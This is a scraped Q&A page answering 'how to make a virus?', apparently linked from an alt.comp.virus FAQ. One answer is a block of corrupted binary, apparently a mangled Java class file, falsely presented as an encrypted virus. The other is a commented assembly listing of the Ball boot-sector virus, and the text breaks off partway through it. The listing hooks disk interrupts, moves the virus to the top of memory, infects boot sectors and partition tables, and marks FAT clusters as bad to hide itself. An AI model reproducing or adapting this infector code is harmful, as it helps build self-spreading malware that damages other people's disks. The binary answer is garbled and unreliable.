...make a virus?

<< Back to: [alt.comp.virus] FAQ Part 1/4

Answer by 00-0
Submitted on 9/13/2004
Rating: Not yet rated	Rate this answer:
this is a virus but is encripted so u have to crack the code to use it. ####################### �� -y �� ` �aN � � ��C��3ELkpqrs � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t?񙙙��@� @ ?�!�'~>?y!�T) �w�}�� w�� "\|#\|$�%�(\|)\|/�0�1�2�4�5�6�7�8�9�:�;�<�=�>�?�@�A�B�C�D�F�G�H�I�J�K�M�N�O�P�Q�R�S�T�U�V�W�X�Y�Z�[�\�]�^�_�`�a�b�cwd}e~f�g�hizj�l�m�n�o�t�u�vuwzxz ()D ()I ()V ()[I ()[Lcgc; (D)D (I)I (I)V (II)V (III)I (III)V (IIIII)I (IIIII)V (IIIIII)V (IIIIIII)I (IIIIIII)V (IIIIIIII)V (IIIII[I[I[ILcgc;I)V (IIIIZ)Z (IIIZ)Z (III[I[I[IILcgc;)V (I[B[II)V (I[III)I (I[Lbki;I)V (Lbki;Lbki;)Z (Lblm;III)V (Lcgc;)V (Ljava/lang/String;)V ([IIII[III)V ([IIII[IIIIIIIIIII)V ([I[IIIIIIIIIIIII)V ([I[I[I[I)Z ([Lbki;II)V ([Lbki;II)Z <clinit> <init> Code ConstantValue D Exceptions I J Lblm; Lcgc; LineNumberTable Ljava/io/PrintStream; LocalVariables SourceFile !Warning tried to add null object! Z [B [I [J [Lbki; [Lcgc; [Lfna; [Z [[B [[I bbe bbe.java bbf bbg bbh bbi bbj bbk bbl bbm bbn bca bcb bcc bcd bce bcf bcg bch bci bcj bck bcl bcm bcn bda bdb bdc bdd bde bdf bdg bdh bdi bdj bdk bdl bdm bdn bea beb bec bed bee bef beg beh bei bej bek bel bem ben bfa bfb bfc bfd bfe bff bfg bfh bfi bfj bfk bfl bfm bfn bga bgb bgc bgd bge bgf bgg bgh bgi bgj bgk bgl bgm bgn bha bhb bhc bhd bhe bhf bhg bhh bhi bhj bhk bhl bhm bhn bia bib bic bid bie bif big bih bii bij bik bil bim bin bja bjb bjc bjd bje bjf bjg bjh bji bjj bjk bjl bjm bjn bka bkb bkc bkd bke bkf bkg bkh bki bkj bkk bkl bkm bkn bla blb blc bld ble blf blg blh bli blj blk bll blm bln bma bmf bnj cam cdj cgc cge cgf cgg cgh cgi cgj cgk cgl cgm cgn cha chb chc chd che chj chk cif cih cii cim cmb cmg cmh cmk cml cnb cnc cos dad fna fnb fnc fnd fne java/io/PrintStream java/lang/Math java/lang/Object java/lang/System out println random sin sqrt ! R �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �? ?? �? �? �? �? �? �? �? �? �? �? �? �? �? �? �? �? �? �? �? �� �? �? �? �? �� �? �? �? �? �? �? ?? �? �? �? �? �? �? �? �? ? ? ? ? 1 ?� ? a 9? 2? ? ? ? ? � ? ? �? !�? "? #* ? $? ' �? (? )? d? .? .? ? /*? .? ? 0 ? 1* ? 2* �? 3* ? 4* ? 5? 6? 7(? ? ^(? ? _(? ? `(? ? a(? ? b(? ? c? d+? Y+? ?l? 2+? ?l? 3+? ?? Z? >? ?? ?? ? @? ?? ? A? B? ? C6? ? C? Y? S??��? D? Yh? ? L? ? E? ? I? ? J? ? F? ? G? ? H? ? K? W� E?? W? 8? 9? :? ;? <? =6? 4? &? �k? � �k�O? & `? �k? ? �k�O? ?��6? 4? %? �k? � �k�O? % `? �k? ? �k�O? ?��? ? E # ( / 6 < B G N S X ^ i s z ? ? ? ! ? " � # ? $ ? % ? & ? ' � ( � ) � � + � , � - � . ? / � 0 1 2 3 4# 5) 67 5@ 8E 9V :^ ;f <n =v >~ ?? @� A? B� C? D? E? F? G? H? I� K� L� I� O� Q R- O8 ? ? _ 3+� ? ? ? ?? >? ?? ? A? >O? @Y? >Z`? >+S? ? Y Z [ ] ! ^ 2 W ? ? ? Q=? F? @2+? 9Y? >d? >>? "? @? @`2S? A? A`.O?? >?��?? >?�?? ? & e f h i k , l : i E e P b w ? M !? m<? ? @S?? >?��? >? ? u v w v y s w ? - ? D? L? ?? ? ~ \| \| ? J "Y? Dd? D? Lh? ?? D� ? D? ? ? ? ? ? ! ? � ? ?? E? DO? F? DO? G? DO? H? DO? I? DO? J? DO? K? DO? L? ?6? Ld? ?6 ? YOY O: ? L ? ?W? L? ?? DO? L? ?Y? DZ`? DT? Dd? ? J � ? � ? ) ? 4 ? ? ? I ? V ? f ? k ? m ? p ? r ? u ? ? ? ? � ? ? \| ? ' ? L? ?T? ? ? � } ? $ ? KO? ? ? ? } ? B *? 4d? +? ,? -? ? ? ? ? ? ? ? v ? ? -? ? ? x ? ? 0? ? ? y ? ? /? ? ? ? ? ? M? 2? 3? 4? 5? 1? 6`? ? [6? ? [? Y? S?`?��? ? . � � � � � � ! � , � 2 � @ � L ? ? ? � ?? ?d6`6`l6+2:++2S+S? �6? <?�+2? �?��?+2? �?��? +2: ++2S+ S?��+? n+`? n? ? V � � � � � � # � ( ? / � 2 � 5 � A � D � P � W � ] � e � k � r � z � ? � � ? \| �6? ,2? ?,2? ?,2? ???��6? ?,2? ?��? ?,2:? ?6`6? d66 ? ?, 2: ? ? ? ?? s ? ?? ?? f? ? ? ?? Y ? ?? ?? L? ? ? ?� ?* ? \|� 4* ? }? ), ? pW, 2 ? ? ? k6 ? ?? ?? � `?�t?�8 ? n � � � � � ( � + � . � 1 � ; � A � B � H � N � R X ^ c j p � � � � � � � ? ? V ?+2:`6? 8+2:? \|? -+S+S=? ? kd? l???��+2:d6? 8+2:? \|? -+S+S>? `? k? l??�?��`? ? k? l?+`? p� ? k?? l>?�E ? ? ! # ) ,! 1# 6$ =% ? H) M U, [- f/ k0 q1 t2 y4 ?5 ?6 ?* ?: ?< �= ?> ?@ ?B ?C ?E ?F ? ? ? ;t `�~6? <t `�~6? =t `�~6? 5? %.6? % `.6hh`z6 hhdz= <? 5? %.6? % `.6hhdz6 hh`z> =? 5? %.6? % `.6hh`z6 hhdz> <? e? ? e? f? ? f? g? ? g? h? ? h? i? ? i? j? ? j? ? � " K L M -N 2P :Q FR TS aT dV iX qY }Z ?[ ?\ ?^ ?` ?a ?b �c �d �f �g �h �i �j �k �l �m �no pqI w ? } 9? Y? ?? d? 2? !h? 6z<? 3? !h? 6z=? e? f? g? h? i? jtt? !? qt? !? qt? !? q? !? q? 2t? 3t? q*? 2t? 3? q*? 2? 3t? q*? 2? 3? q? e? 8`? e? f? 8`? f? g? 9`? g? h? 9`? h? i? :`? i? j? :`? j? @? >? LS? L? ?>? /? @2? 8? 9? :? ;? <? =? 6? ? ??? >?��? @? >2? 8? 9? :? ;? <? =? 6? ? ?? B6??? @2:? ??�6?~? ?.6? ?2:6 6 ? .? ? ..6 ? ? ? !? ? 6 ? ? ?�� ?'6 6? ;? �..6 ? 2t? ?6 ? 2? ?6 ? ? ??�� ? �6 6? ;? �..6? 3t? ?6 ? 3? ?6 ? ? ??�� ? ?? C? B2:? �? ?*? B? z? ?� ? ?.6? ? ?.6� D66? ? ?..`6??��lY6? �? ?Y? B`? B?? ??�~?? >?�[? L:? ?? �6? �? ?2:.6? �.6 ? �.6 ? ?.6 ? ? ? ? "? ?? I.? 6x l6? J.? 6x l6 ld? 2? g l`? 2t? X d? 3? L ? 3t? B? C? B2:? �? ?*? B? { ? ?..`l? �Y? B`? B?? ??�"? B� ?? B? ? C? Bd? nd? C? B? o6?�? C2:? �:? %

Answer by LOL
Submitted on 12/23/2004
Rating: Not yet rated	Rate this answer:
TITLE * ASMGEN - Version 2.51 * SUBTTL BALL.VIR 3-15-89 [3-22-89] RET_NEAR MACRO DB 0C3H ENDM ; .RADIX 16 ; ;INITIAL VALUES : CS:IP 0000:0100 ; SS:SP 0000:FFFF ;L0000S L7C00 DI L7C1C CI L7C93 CJ L7D31 DB L7D76 DB L7DF7 CB L7DF8 CB ; L7DFB CB L7E86 DI L7EA9 DI L7EB2 CB L7EBF DI L7F4E DB L7F62 DB ; L7FCB CI L7FCD CI L7FD3 CB S0000 SEGMENT ASSUME DS:S0000,SS:S0000,CS:S0000,ES:S0000 ORG $+7C00H L0000 EQU $-7C00 ;L0001 L7C0E CI L7CDA DB L7D12 DB L7D33 DI L7D46 DB L7DE0 DI L7DF3 CI ; L7E3A DI L7E60 DI L7EFC DB L7F37 DB L7F43 DI L7FAD DB L7FB6 DI L0001 EQU $-7BFF ;L0002 L7C0D CB L7C10 CB L7C16 CI L7C1A CI L7C2A DI L7CE1 DB L7D5A DB ; L7D93 DB L7E08 DB L7E75 DI L7EB3 DB L7EBA DB L7F2C DB L7FA0 DB ; L7FBF DB L0002 EQU $-7BFE ;L0003 L7E12 DI L7F1C DB L7F27 DB L7F82 DB L0003 EQU $-7BFDh ;L0004 L7D43 DI L7D46 DB L7D4C DB L7D4C DB L7DDB DB L7E15 DB L7E31 DB ; L7E38 DB L7E54 DB L7E5E DB L7F05 DB L0004 EQU $-7BFC ;L0005 L7F8B DB L0005 EQU $-7BFBh ;L0006 L7C30 DB L7CB5 DB L0006 EQU $-7BFA ;L0007 L7EFE DB L7F80 DB L0007 EQU $-7BF9 ;L0008 L7FA4 DB L0008 EQU $-7BF8 ;L0009 L7C18 CI L7F46 DB L0009 EQU $-7BF7 ;L000F L7E42 DB L7E5B DB L7EE6 DB L000F EQU $-7BF1 ;L0010 L7D52 DI L0010 EQU $-7BF0 ;L0013 L7DFB CB L0013 EQU $-7BEDh ;L0018 L7F58 DB L0018 EQU $-7BE8 ;L001C L7D69 DI L001C EQU $-7BE4 ;L0020 L7C59 DI L7DA8 DI L7E9A DI L7EC4 DR L7ECB DW L7FC9 CI L0020 EQU $-7BE0 ;L0022 L7EC7 DR L7ED1 DW L0022 EQU $-7BDE ;L0024 L7D0D DI L0024 EQU $-7BDC ;L0040 L7EA4 DI L0040 EQU $-7BC0 ;L004C L7C75 DR L7C7C DW L004C EQU $-7BB4 ;L004E L7C78 DR L7C82 DW L004E EQU $-7BB2 ;L0050 L7FD6 CB L0050 EQU $-7BB0 ;L0055 L7DFE CB L0055 EQU $-7BABh ;L0057 L7DFB CB L0057 EQU $-7BA9 ;L0070 L7C11 CI L0070 EQU $-7B90 ;L0073 L7DF5 CI L0073 EQU $-7B8Dh ;L007F L7CF4 DB L007F EQU $-7B81 ;L0080 L7C4E DB L7D39 DB L0080 EQU $-7B80 ;L0083 L7FB4 DB L0083 EQU $-7B7Dh ;L00AA L7DFE CB L00AA EQU $-7B56 ;L00D3 L7DF9 CI L00D3 EQU $-7B2Dh ;L00EA L7D29 DB L7FC8 DB L00EA EQU $-7B16 ;L00F0 L7CF9 DB L00F0 EQU $-7B10 ;L00FB L7DD1 DB L00FB EQU $-7B05 ;L00FD L7C15 CB L00FD EQU $-7B03 ;L00FE L7D1E DB L7DEC DB L00FE EQU $-7B02 ;L00FF L7F53 DB L7F5D DB L7F67 DB L7F72 DB L7F86 DB L7F8F DB L00FF EQU $-7B01 ;L0100 L7C3E DI L0100 EQU $-7B00 ;L0101 L7F10 DI L7F16 DI L7FCD CI L0101 EQU $-7AFF ;L01FF L7DAF DI L7E27 DI L01FF EQU $-7A01 ;L0200 L7C0B CI L7D8B DI L7DB2 DI L0200 EQU $-7A00 ;L0201 L7C9D DI L7D2E DI L7D5D DI L0201 EQU $-79FF ;L02D0 L7C13 CI L02D0 EQU $-7930 ;L0301 L7C98 DI L0301 EQU $-78FF ;L0413 L7C27 DR L7C2D DW L0413 EQU $-77EDh ;L07C0 L7C34 DI L07C0 EQU $-7440 ;L0907 L7FB9 DI L0907 EQU $-72F9 ;L0FF0 L7DD6 DI L0FF0 EQU $-6C10 ;L1357 L7D6E DI L1357 EQU $-68A9 ;L49E8 L7EB0 CI L49E8 EQU $-3218 ;L77C0 L7D2C CI L77C0 EQU $-440 ;L7C00 L7C22 DI L7C39 DI L7C93 CJ ; Boot entry of Virus BOOT: JMP SHORT INIT ;Init virus ;7C00 EB 1C ;L7C02 L7D66 DI L7C02: NOP ;7C02 90 ; OEM DB 'DOS 3.1' ;7C03 44 4F 53 20 20 33 2E 31 ; Size of Disk sector in bytes SEC_SIZE EQU $ DW L0200 ;7C0B 00 02 ;L7C0D L7DC4 DR L7E78 DR ; Size of Cluster in sectors CLSTSIZE EQU $ DB 2 ;7C0D 02 ;L7C0E L7DE3 DR RES_SECT EQU $ DW L0001 ;7C0E 01 00 FAT_NUMBER EQU $ DB 2 ;7C10 02 ; Size of root directory in Dir entryes ROOT_SIZE EQU $ DW L0070 ;7C11 70 00 ;L7C13 L7DBD DR TOTAL_SECTORS EQU $ DW L02D0 ;7C13 D0 02 MEDIA_TYPE EQU $ DB 0FDh ;7C15 FD ; Size of FAT in sectors FAT_SIZE EQU $ DW L0002 ;7C16 02 00 ;L7C18 L7CA7 DR SEC_TRACK EQU $ DW L0009 ;7C18 09 00 ;L7C1A L7CB1 DR HEADS DW L0002 ;7C1A 02 00 ;L7C1C L7CA1 DR HIDDEN_SCS EQU $ DW L0000 ;7C1C 00 00 ;L7C1E L7C00 CJ ; Init virus INIT: XOR AX,AX ;7C1E 33 C0 MOV SS,AX ;7C20 8E D0 MOV SP,OFFSET BOOT ;Boot entry of Virus ;7C22 BC 00 7C MOV DS,AX ;7C25 8E D8 MOV AX,DS:MEM_SIZE ;Memory size in kilobytes ;7C27 A1 13 04 SUB AX,2 ;7C2A 2D 02 00 MOV DS:MEM_SIZE,AX ;Memory size in kilobytes ;7C2D A3 13 04 MOV CL,6 ;7C30 B1 06 SHL AX,CL ;7C32 D3 E0 SUB AX,7C0 ;7C34 2D C0 07 MOV ES,AX ;7C37 8E C0 MOV SI,OFFSET BOOT ;Boot entry of Virus ;7C39 BE 00 7C MOV DI,SI ;7C3C 8B FE MOV CX,100 ;7C3E B9 00 01 ; Moving virus to end of memory REPZ MOVSW ;7C41 F3 A5 ; And Jump There MOV CS,AX ;7C43 8E C8 ; CS and DS to new virus location PUSH CS ;7C45 0E POP DS ;7C46 1F CALL SELF ;Push ip in stack ;7C47 E8 00 00 ;L7C4A L7C47 CC ; Push ip in stack SELF: XOR AH,AH ;7C4A 32 E4 INT 13 ;7C4C CD 13 AND BYTE PTR CUR_DRIVE,80 ;Last Drive Accessed ;7C4E 80 26 F8 7D 80 MOV BX,VIRUSLSN ;LSN of Virus extention ;7C53 8B 1E F9 7D PUSH CS ;7C57 0E POP AX ;7C58 58 SUB AX,20 ;' ' ;7C59 2D 20 00 ; Reading second part of virus MOV ES,AX ;7C5C 8E C0 CALL READ_SC ;Reads sector BX = LSN ;7C5E E8 3C 00 MOV BX,VIRUSLSN ;LSN of Virus extention ;7C61 8B 1E F9 7D INC BX ;7C65 43 MOV AX,OFFSET LFFC0 ;7C66 B8 C0 FF ; Readind original boot sector MOV ES,AX ;7C69 8E C0 CALL READ_SC ;Reads sector BX = LSN ;7C6B E8 2F 00 XOR AX,AX ;7C6E 33 C0 MOV FLAGS,AL ;Sum semapfor type flags ;7C70 A2 F7 7D MOV DS,AX ;7C73 8E D8 MOV AX,DS:INT13_OFF ;7C75 A1 4C 00 MOV BX,DS:INT13_SEG ;7C78 8B 1E 4E 00 MOV WORD PTR DS:INT13_OFF,OFFSET NEW_INT13 ;7C7C C7 06 4C 00 D0 7C MOV DS:INT13_SEG,CS ;7C82 8C 0E 4E 00 PUSH CS ;7C86 0E POP DS ;7C87 1F MOV OLD_INT13_OFF,AX ;7C88 A3 2A 7D MOV OLD_INT13_SEG,BX ;7C8B 89 1E 2C 7D MOV DL,CUR_DRIVE ;Last Drive Accessed ;7C8F 8A 16 F8 7D JMP FAR PTR BOOTDS: ;Boot entry of Virus ;7C93 EA 00 7C 00 00 ;L7C98 L7E70 CC L7E8F CC L7E9F CC L7EAC CC ; Writes sector BX = LSN WRITESC: MOV AX,301 ;7C98 B8 01 03 JMP SHORT OPERATE ;7C9B EB 03 ;L7C9D L7C5E CC L7C6B CC L7E0D CC L7E89 CC ; Reads sector BX = LSN READ_SC: MOV AX,201 ;7C9D B8 01 02 ;L7CA0 L7C9B CJ OPERATE: XCHG BX,AX ;7CA0 93 ADD AX,HIDDEN_SCS ;7CA1 03 06 1C 7C XOR DX,DX ;7CA5 33 D2 DIV WORD PTR SEC_TRACK ;7CA7 F7 36 18 7C INC DL ;7CAB FE C2 MOV CH,DL ;7CAD 8A EA XOR DX,DX ;7CAF 33 D2 DIV WORD PTR HEADS ;7CB1 F7 36 1A 7C MOV CL,6 ;7CB5 B1 06 SHL AH,CL ;7CB7 D2 E4 OR AH,CH ;7CB9 0A E5 MOV CX,AX ;7CBB 8B C8 XCHG CH,CL ;7CBD 86 E9 MOV DH,DL ;7CBF 8A F2 MOV AX,BX ;7CC1 8B C3 ;L7CC3 L7D36 CC L7D60 CC ; Access disk service and returns one level more if Error DISK_CALL: MOV DL,CUR_DRIVE ;Last Drive Accessed ;7CC3 8A 16 F8 7D MOV BX,OFFSET R_W_BUFF ;Buffer for read/write sector ;7CC7 BB 00 80 INT 13 ;7CCA CD 13 JNB EXIT_D_CALL ;7CCC 73 01 POP AX ;7CCE 58 ;L7CCF L7CCC CJ EXIT_D_CALL: RET_NEAR ;7CCF C3 ;L7CD0 L7C7C DI L7D2A CI NEW_INT13: PUSH DS ;7CD0 1E PUSH ES ;7CD1 06 PUSH AX ;7CD2 50 PUSH BX ;7CD3 53 PUSH CX ;7CD4 51 PUSH DX ;7CD5 52 PUSH CS ;7CD6 0E POP DS ;7CD7 1F PUSH CS ;7CD8 0E POP ES ;7CD9 07 TEST BYTE PTR FLAGS,1 ;Sum semapfor type flags ;7CDA F6 06 F7 7D 01 JNZ EXIT_INT13 ;7CDF 75 42 CMP AH,2 ;7CE1 80 FC 02 JNZ EXIT_INT13 ;7CE4 75 3D CMP CUR_DRIVE,DL ;Last Drive Accessed ;7CE6 38 16 F8 7D MOV CUR_DRIVE,DL ;Last Drive Accessed ;7CEA 88 16 F8 7D JNZ L7D12 ;Don't Run if less then 24 Ticks ;7CEE 75 22 XOR AH,AH ;7CF0 32 E4 INT 1A ;7CF2 CD 1A ; CX:DX <- BIOS Time TEST DH,7F ;7CF4 F6 C6 7F JNZ DONTBALL ;Do not display ball ;7CF7 75 0A TEST DL,0F0 ;7CF9 F6 C2 F0 JNZ DONTBALL ;Do not display ball ;7CFC 75 05 PUSH DX ;7CFE 52 CALL BALL_ACT ;Activate Ball on Screen ;7CFF E8 B1 01 POP DX ;7D02 5A ;L7D03 L7CF7 CJ L7CFC CJ ; Do not display ball DONTBALL: MOV CX,DX ;7D03 8B CA SUB DX,TIME ;Last time drive is accessed ;7D05 2B 16 B0 7E MOV TIME,CX ;Last time drive is accessed ;7D09 89 0E B0 7E SUB DX,24 ;'$' ;7D0D 83 EA 24 JB EXIT_INT13 ;7D10 72 11 ;L7D12 L7CEE CJ ; Don't Run if less then 24 Ticks L7D12: OR BYTE PTR FLAGS,1 ;Sum semapfor type flags ;7D12 80 0E F7 7D 01 PUSH SI ;7D17 56 PUSH DI ;7D18 57 CALL ATTACH ;Attachs Last accessed device ;7D19 E8 12 00 POP DI ;7D1C 5F POP SI ;7D1D 5E AND BYTE PTR FLAGS,0FE ;Sum semapfor type flags ;7D1E 80 26 F7 7D FE ;L7D23 L7CDF CJ L7CE4 CJ L7D10 CJ EXIT_INT13: POP DX ;7D23 5A POP CX ;7D24 59 POP BX ;7D25 5B POP AX ;7D26 58 POP ES ;7D27 07 POP DS ;7D28 1F ; Opcode of far jmp DB 0EA ;7D29 EA ;L7D2A L7C88 DW OLD_INT13_OFF EQU $ DW NEW_INT13 ;7D2A D0 7C ;L7D2C L7C8B DW OLD_INT13_SEG EQU $ DW L77C0 ;7D2C C0 77 ;L7D2E L7D19 CC ; Attachs Last accessed device ATTACH: MOV AX,201 ;7D2E B8 01 02 MOV DH,0 ;7D31 B6 00 MOV CX,1 ;7D33 B9 01 00 CALL DISK_CALL ;Access disk service and returns one level more if Error ;7D36 E8 8A FF TEST BYTE PTR CUR_DRIVE,80 ;Last Drive Accessed ;7D39 F6 06 F8 7D 80 JZ BOOT_READ ;Boot sector now in memory ;7D3E 74 23 MOV SI,OFFSET PART_TABLE ;Partition Table ;7D40 BE BE 81 MOV CX,4 ;7D43 B9 04 00 ;L7D46 L7D55 CJ ; Search in Partition table PART_SEARCH: CMP BYTE PTR [SI+4],1 ;7D46 80 7C 04 01 JZ FOUND_IN_PART ;Boot sector found in partition table ;7D4A 74 0C CMP BYTE PTR [SI+4],4 ;7D4C 80 7C 04 04 JZ FOUND_IN_PART ;Boot sector found in partition table ;7D50 74 06 ADD SI,10 ;7D52 83 C6 10 LOOP PART_SEARCH ;Search in Partition table ;7D55 E2 EF RET_NEAR ;7D57 C3 ;L7D58 L7D4A CJ L7D50 CJ ; Boot sector found in partition table FOUND_IN_PART: MOV DX,[SI] ;7D58 8B 14 MOV CX,[SI+2] ;7D5A 8B 4C 02 MOV AX,201 ;7D5D B8 01 02 CALL DISK_CALL ;Access disk service and returns one level more if Error ;7D60 E8 60 FF ;L7D63 L7D3E CJ ; Boot sector now in memory BOOT_READ: MOV SI,OFFSET L8002 ;7D63 BE 02 80 MOV DI,OFFSET L7C02 ;7D66 BF 02 7C MOV CX,1C ;7D69 B9 1C 00 REPZ MOVSB ;7D6C F3 A4 CMP WORD PTR L81FC,1357 ;'W' ;7D6E 81 3E FC 81 57 13 JNZ NOT_ATTCD ;Disk is not yet Attached ;7D74 75 15 CMP BYTE PTR L81FB,0 ;7D76 80 3E FB 81 00 JNB EXIT_RDY ;Exit allready attached ;7D7B 73 0D MOV AX,D_LSN_D ;LSN of first data sector of disk ;7D7D A1 F5 81 MOV D_LSN,AX ;LSN of first data sector ;7D80 A3 F5 7D MOV SI,LSN_DSK ;LSN of virus of Disk ;7D83 8B 36 F9 81 JMP WRITE_CODE ;Writes it self in two sectors of disk ;7D87 E9 08 01 ;L7D8A L7D7B CJ L7D91 CJ L7D98 CJ ; Exit allready attached EXIT_RDY: RET_NEAR ;7D8A C3 ;L7D8B L7D74 CJ ; Disk is not yet Attached NOT_ATTCD: CMP WORD PTR SEC_SIZE_D,200 ;Size of Disk sector in bytes of Disk ;7D8B 81 3E 0B 80 00 02 JNZ EXIT_RDY ;Exit allready attached ;7D91 75 F7 CMP BYTE PTR CLSTSIZE_D,2 ;Size of Cluster in sectors of Disk ;7D93 80 3E 0D 80 02 JB EXIT_RDY ;Exit allready attached ;7D98 72 F0 MOV CX,RES_SECT_D ;of Disk ;7D9A 8B 0E 0E 80 MOV AL,FAT_NUMBER_D ;of Disk ;7D9E A0 10 80 CBW ;7DA1 98 MUL WORD PTR FAT_SIZE_D ;Size of FAT in sectors of Disk ;7DA2 F7 26 16 80 ADD CX,AX ;7DA6 03 C8 MOV AX,20 ;' ' ;7DA8 B8 20 00 MUL WORD PTR ROOT_SIZE_D ;Size of root directory in Dir entryes of Disk ;7DAB F7 26 11 80 ADD AX,1FF ;7DAF 05 FF 01 MOV BX,200 ;7DB2 BB 00 02 DIV BX ;7DB5 F7 F3 ADD CX,AX ;7DB7 03 C8 MOV D_LSN,CX ;LSN of first data sector ;7DB9 89 0E F5 7D MOV AX,TOTAL_SECTORS ;7DBD A1 13 7C SUB AX,D_LSN ;LSN of first data sector ;7DC0 2B 06 F5 7D MOV BL,CLSTSIZE ;Size of Cluster in sectors ;7DC4 8A 1E 0D 7C XOR DX,DX ;7DC8 33 D2 XOR BH,BH ;7DCA 32 FF DIV BX ;7DCC F7 F3 INC AX ;7DCE 40 MOV DI,AX ;7DCF 8B F8 AND BYTE PTR FLAGS,0FBh ;Sum semapfor type flags ;7DD1 80 26 F7 7D FB CMP AX,0FF0 ;7DD6 3D F0 0F JBE FAT_12_0 ;12 bit FAT ;7DD9 76 05 OR BYTE PTR FLAGS,4 ;Sum semapfor type flags ;7DDB 80 0E F7 7D 04 ;L7DE0 L7DD9 CJ ; 12 bit FAT FAT_12_0: MOV SI,1 ;7DE0 BE 01 00 MOV BX,RES_SECT ;7DE3 8B 1E 0E 7C DEC BX ;7DE7 4B MOV LSN_TEMP,BX ;Sector to operate temp variable ;7DE8 89 1E F3 7D MOV BYTE PTR FAT_ADJUST,0FE ;Adjust pointer in FAT ;7DEC C6 06 B2 7E FE JMP SHORT NEXT_F_S ;Next Sector of FAT. It is in Second Virus Sector. ;7DF1 EB 0D ;L7DF3 L7DE8 DW L7E00 DM L7E04 DR L7E6C DR ; Sector to operate temp variable LSN_TEMP EQU $ DW L0001 ;7DF3 01 00 ;L7DF5 L7D80 DW L7DB9 DW L7DC0 DR L7E80 DR ; LSN of first data sector D_LSN DW L0073 ;7DF5 73 00 ;L7DF7 L7C70 DW L7CDA DT L7D12 DM L7D1E DM L7DD1 DM L7DDB DM L7E15 DT ; L7E31 DT L7E54 DT L7EB3 DT L7EBA DM ; Sum semapfor type flags FLAGS DB 0 ;7DF7 00 ;L7DF8 L7C4E DM L7C8F DR L7CC3 DR L7CE6 DT L7CEA DW L7D39 DT ; Last Drive Accessed CUR_DRIVE EQU $ DB 0 ;7DF8 00 ;L7DF9 L7C53 DR L7C61 DR L7E94 DW ; LSN of Virus extention VIRUSLSN EQU $ DW L00D3 ;7DF9 D3 00 ; Marker 'Disk Attached' DB 0,57,13 ;7DFB 00 57 13 ; Boot sector marker DB 55,0AA ;7DFE 55 AA ;L7E00 L7DF1 CJ L7E2B CJ ; Next Sector of FAT. It is in Second Virus Sector. NEXT_F_S: INC WORD PTR LSN_TEMP ;Sector to operate temp variable ;7E00 FF 06 F3 7D MOV BX,LSN_TEMP ;Sector to operate temp variable ;7E04 8B 1E F3 7D ADD BYTE PTR FAT_ADJUST,2 ;Adjust pointer in FAT ;7E08 80 06 B2 7E 02 CALL READ_SC ;Reads sector BX = LSN ;7E0D E8 8D FE JMP SHORT NEXT_ENTRY ;Next entry in FAT ;7E10 EB 39 ;L7E12 L7E4E CJ ; Process single FAT entry NEXT_ENTRY_LOOP: MOV AX,3 ;7E12 B8 03 00 TEST BYTE PTR FLAGS,4 ;Sum semapfor type flags ;7E15 F6 06 F7 7D 04 JZ FAT_12_1 ;AX = Bytes per two clusters in FAT ;7E1A 74 01 INC AX ;7E1C 40 ;L7E1D L7E1A CJ ; AX = Bytes per two clusters in FAT FAT_12_1: MUL SI ;7E1D F7 E6 SHR AX,1 ;7E1F D1 E8 SUB AH,FAT_ADJUST ;Adjust pointer in FAT ;7E21 2A 26 B2 7E MOV BX,AX ;7E25 8B D8 CMP BX,1FF ;7E27 81 FB FF 01 JNB NEXT_F_S ;Next Sector of FAT. It is in Second Virus Sector. ;7E2B 73 D3 MOV DX,[BX+R_W_BUFF] ;Buffer for read/write sector ;7E2D 8B 97 00 80 TEST BYTE PTR FLAGS,4 ;Sum semapfor type flags ;7E31 F6 06 F7 7D 04 JNZ FAT_16_1 ;7E36 75 0D MOV CL,4 ;7E38 B1 04 TEST SI,1 ;7E3A F7 C6 01 00 JZ RIGHT_ENTRY ;Dont move FAT entry ;7E3E 74 02 SHR DX,CL ;7E40 D3 EA ;L7E42 L7E3E CJ ; Dont move FAT entry RIGHT_ENTRY: AND DH,0F ;7E42 80 E6 0F ;L7E45 L7E36 CJ FAT_16_1: TEST DX,0FFFF ;7E45 F7 C2 FF FF JZ FOUND_CL ;Free cluster found ;7E49 74 06 ;L7E4B L7E10 CJ ; Next entry in FAT NEXT_ENTRY: INC SI ;7E4B 46 CMP SI,DI ;7E4C 3B F7 JBE NEXT_ENTRY_LOOP ;Process single FAT entry ;7E4E 76 C2 RET_NEAR ;7E50 C3 ;L7E51 L7E49 CJ ; Free cluster found FOUND_CL: MOV DX,OFFSET LFFF7 ;7E51 BA F7 FF TEST BYTE PTR FLAGS,4 ;Sum semapfor type flags ;7E54 F6 06 F7 7D 04 JNZ WRITE_BAD ;Write marker for bad sector ;7E59 75 0D AND DH,0F ;7E5B 80 E6 0F MOV CL,4 ;7E5E B1 04 TEST SI,1 ;7E60 F7 C6 01 00 JZ WRITE_BAD ;Write marker for bad sector ;7E64 74 02 SHL DX,CL ;7E66 D3 E2 ;L7E68 L7E59 CJ L7E64 CJ ; Write marker for bad sector WRITE_BAD: OR [BX+R_W_BUFF],DX ;Buffer for read/write sector ;7E68 09 97 00 80 MOV BX,LSN_TEMP ;Sector to operate temp variable ;7E6C 8B 1E F3 7D CALL WRITESC ;Writes sector BX = LSN ;7E70 E8 25 FE MOV AX,SI ;7E73 8B C6 SUB AX,2 ;7E75 2D 02 00 MOV BL,CLSTSIZE ;Size of Cluster in sectors ;7E78 8A 1E 0D 7C XOR BH,BH ;7E7C 32 FF MUL BX ;7E7E F7 E3 ADD AX,D_LSN ;LSN of first data sector ;7E80 03 06 F5 7D MOV SI,AX ;7E84 8B F0 MOV BX,0 ;7E86 BB 00 00 CALL READ_SC ;Reads sector BX = LSN ;7E89 E8 11 FE MOV BX,SI ;7E8C 8B DE INC BX ;7E8E 43 CALL WRITESC ;Writes sector BX = LSN ;7E8F E8 06 FE ;L7E92 L7D87 CJ ; Writes it self in two sectors of disk WRITE_CODE: MOV BX,SI ;7E92 8B DE MOV VIRUSLSN,SI ;LSN of Virus extention ;7E94 89 36 F9 7D PUSH CS ;7E98 0E POP AX ;7E99 58 SUB AX,20 ;' ' ;7E9A 2D 20 00 MOV ES,AX ;7E9D 8E C0 CALL WRITESC ;Writes sector BX = LSN ;7E9F E8 F6 FD ; OverWrite Boot sector PUSH CS ;7EA2 0E POP AX 